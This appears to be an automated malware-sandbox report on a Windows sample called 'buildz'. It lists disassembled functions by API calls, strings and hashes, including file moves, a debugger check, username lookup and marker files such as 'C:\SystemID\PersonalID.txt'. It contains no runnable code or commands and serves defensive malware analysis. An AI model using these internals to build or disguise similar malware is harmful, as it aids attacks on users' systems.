                          • RegisterClassExW.USER32(00000030), ref: 0041BA73
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ClassCursorLoadRegister
                          • String ID: 0$LPCWSTRszWindowClass
                          • API String ID: 1693014935-1496217519
                          • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                          • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                          • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                          • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                          • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                          • DeleteFileA.KERNEL32(?), ref: 0040C45B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$AppendDeleteFileFolder
                          • String ID: bowsakkdestx.txt
                          • API String ID: 610490371-2616962270
                          • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                          • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                          • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                          • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: p2Q
                          • API String ID: 2102423945-1521255505
                          • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                          • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmove_strtok
                          • String ID:
                          • API String ID: 3446180046-0
                          • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                          • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                          • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                          • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                          • String ID:
                          • API String ID: 2974526305-0
                          • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                          • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                          • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                          • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                          • __isleadbyte_l.LIBCMT ref: 0043C6DB
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                          • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                          • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                          • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                          APIs
                          • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                          • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                          • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                          • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleWritelstrlen
                          • String ID:
                          • API String ID: 1421093161-0
                          • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                          • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                          • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                          • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 004C70AB
                            • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                            • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                          • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                          • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                          • CallCatchBlock.LIBCMT ref: 004C70F8
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                          • String ID:
                          • API String ID: 2901542994-0
                          • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                          • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                          APIs
                            • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                            • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                          • __calloc_crt.LIBCMT ref: 00425A01
                            • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                          • __lock.LIBCMT ref: 00425A37
                          • ___addlocaleref.LIBCMT ref: 00425A43
                          • __lock.LIBCMT ref: 00425A57
                            • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                          • String ID:
                          • API String ID: 2580527540-0
                          • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                          • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                          • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                          • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                          APIs
                          • lstrlenW.KERNEL32 ref: 004127B9
                          • _malloc.LIBCMT ref: 004127C3
                            • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                            • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                            • Part of subcall function 00420C62: HeapAlloc.KERNEL32(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                          • _memset.LIBCMT ref: 004127CE
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                          • String ID:
                          • API String ID: 3705855051-0
                          • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                          • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                          • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                          • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                          APIs
                          • lstrlenA.KERNEL32 ref: 00412806
                          • _malloc.LIBCMT ref: 00412814
                            • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                            • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                            • Part of subcall function 00420C62: HeapAlloc.KERNEL32(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                          • _memset.LIBCMT ref: 0041281F
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                          • String ID:
                          • API String ID: 3705855051-0
                          • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                          • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                          • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                          • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 4104443479-4289949731
                          • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                          • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                          • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                          • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: .\crypto\asn1\tasn_new.c
                          • API String ID: 2102423945-2878120539
                          • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                          • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                          • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                          • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 4104443479-4289949731
                          • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                          • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                          • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                          • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                            • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                            • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                            • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                            • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                            • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                            • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                            • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                          • TranslateMessage.USER32(?), ref: 0041B4CD
                          • DispatchMessageW.USER32(?), ref: 0041B4D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                          • String ID: %username%$I:\5d2860c89d774.jpg
                          • API String ID: 441990211-897913220
                          • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                          • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                          • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                          • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .\crypto\err\err.c$unknown
                          • API String ID: 0-565200744
                          • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                          • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                          • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                          • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                          APIs
                          • _memset.LIBCMT ref: 0042419D
                          • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: DebuggerPresent_memset
                          • String ID: i;B
                          • API String ID: 2328436684-472376889
                          • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                          • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                          • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                          • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                          • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor___raise_securityfailure
                          • String ID: 8Q
                          • API String ID: 3761405300-2096853525
                          • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                          • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                          • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                          • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                          APIs
                          • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                            • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                          • _memset.LIBCMT ref: 00413C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                          • String ID: vector<T> too long
                          • API String ID: 1327501947-3788999226
                          • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                          • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                          • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                          • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _fputws$CreateDirectory
                          • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                          • API String ID: 2590308727-54166481
                          • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                          • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                          • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                          • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                          APIs
                          Strings
                          • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __calloc_crt
                          • String ID: Assertion failed: %s, file %s, line %d
                          • API String ID: 3494438863-969893948
                          • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                          • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                          • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                          • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                          APIs
                          • _memset.LIBCMT ref: 00480686
                            • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                          Strings
                          • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                          • .\crypto\evp\digest.c, xrefs: 00480638
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset_raise
                          • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                          • API String ID: 1484197835-3867593797
                          • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                          • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
